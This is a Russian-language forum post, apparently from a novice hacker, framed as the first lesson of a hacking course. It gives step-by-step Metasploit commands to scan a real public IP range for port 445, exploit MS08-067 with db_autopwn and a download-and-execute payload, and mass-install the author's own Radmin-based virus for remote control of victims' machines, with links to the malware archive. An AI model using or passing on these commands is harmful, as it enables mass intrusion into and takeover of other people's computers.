Если честно я относительно новичок в хакинге, но решил попробовать написать статью а возможно и серию если вам понравиться

Причина в том,что судя по другим статьям, чисто обучения нет, есть практические приёмы и секреты, по которым можно выпендреться перед друзьями взломав древний сайт с уязвимостями скриптов(есть исключения)

Но взломав этот сайт по инструкции ты не будешь понимать принципа работы уязвимости, так вот я попытаюсь составить план обучения для новичков, от a до я,кидая ссылки,давая задания, а чтобы вам не становилось скучно иногда буду про хакерские секреты и писать

Сразу скажу что хакерство это целая наука,и местами нужно учить как в школе или универе)

И так начну)

урок 1 практика
использование ms08_067 для массрутинга и массовой заливки своего вируса(многое взял из журнала хакер, но довёл до работы).По идее у вас будет несколько дедиков, в зависимости от диапазона ip

и так, вам понадобиться:
-metasploit framework с оф сайта
-этот архив с исправлениями для metasploita, вирусом написанным мною и основанном на радмине, картинки процесса
http://narod.ru/disk/14499386000/The beggining.rar.html
http://letitbit.net/download/5661.5916a … g.rar.html
-место куда залить вирус, чтобы была прямая ссылка
-клиент радмина с оф сайта
вроде всё)

Приготовления:
1)
скачиваем
-metasploit framework 3.2 именно 3.2
-radmin client выше 3)
-мой архив
Устанавливаем метсаплоит(полную установку с nmap) и патчим его патчами из архива. инструкция внутри)Хд

2)
ищем хостинг куда можно закинуть hz.exe(radmin)
я у себя сервер поставил
надо так,чтобы при нажатии на ссылку сразу закачка начиналась,так что letitbit не то)

Действия:
1)узнаём свой внешний ip: ziz.h18.ru/ip.php мой сайт, так что юзайте на здоровье
2)запускаем метасплоит
на верху windows>console
пишем
load db_sqlite3 загружает библиотеку
db_create создаёт базу данных
db_nmap -sT -PN -PS445 -p445 87.117.180-190.* сканирует хосты на наличие открытых 445 tcp портов(не советую слишком большой диапазон брать, времени много займёт, как у меня основываясь на своём сделайте). ждём минут 5, покажется что зависло всё,но это не так)
setg URL http://172.16.1.10/hz.exe это задаст параметр который отвечает за то,откуда нагрузка скачает вирус
db_autopwn -e -p -P windows/download_exec/bind_tcp -m ms08_067 это всё запустит, через какое то время в module output появяться шеллы, на них ip написан, на них и коннектимся радмином))))либо просто кликните на них и ручками всё сделайте)чисто фантазия уже)))

эту уязвимость использовал conficer(крупнейший botnet)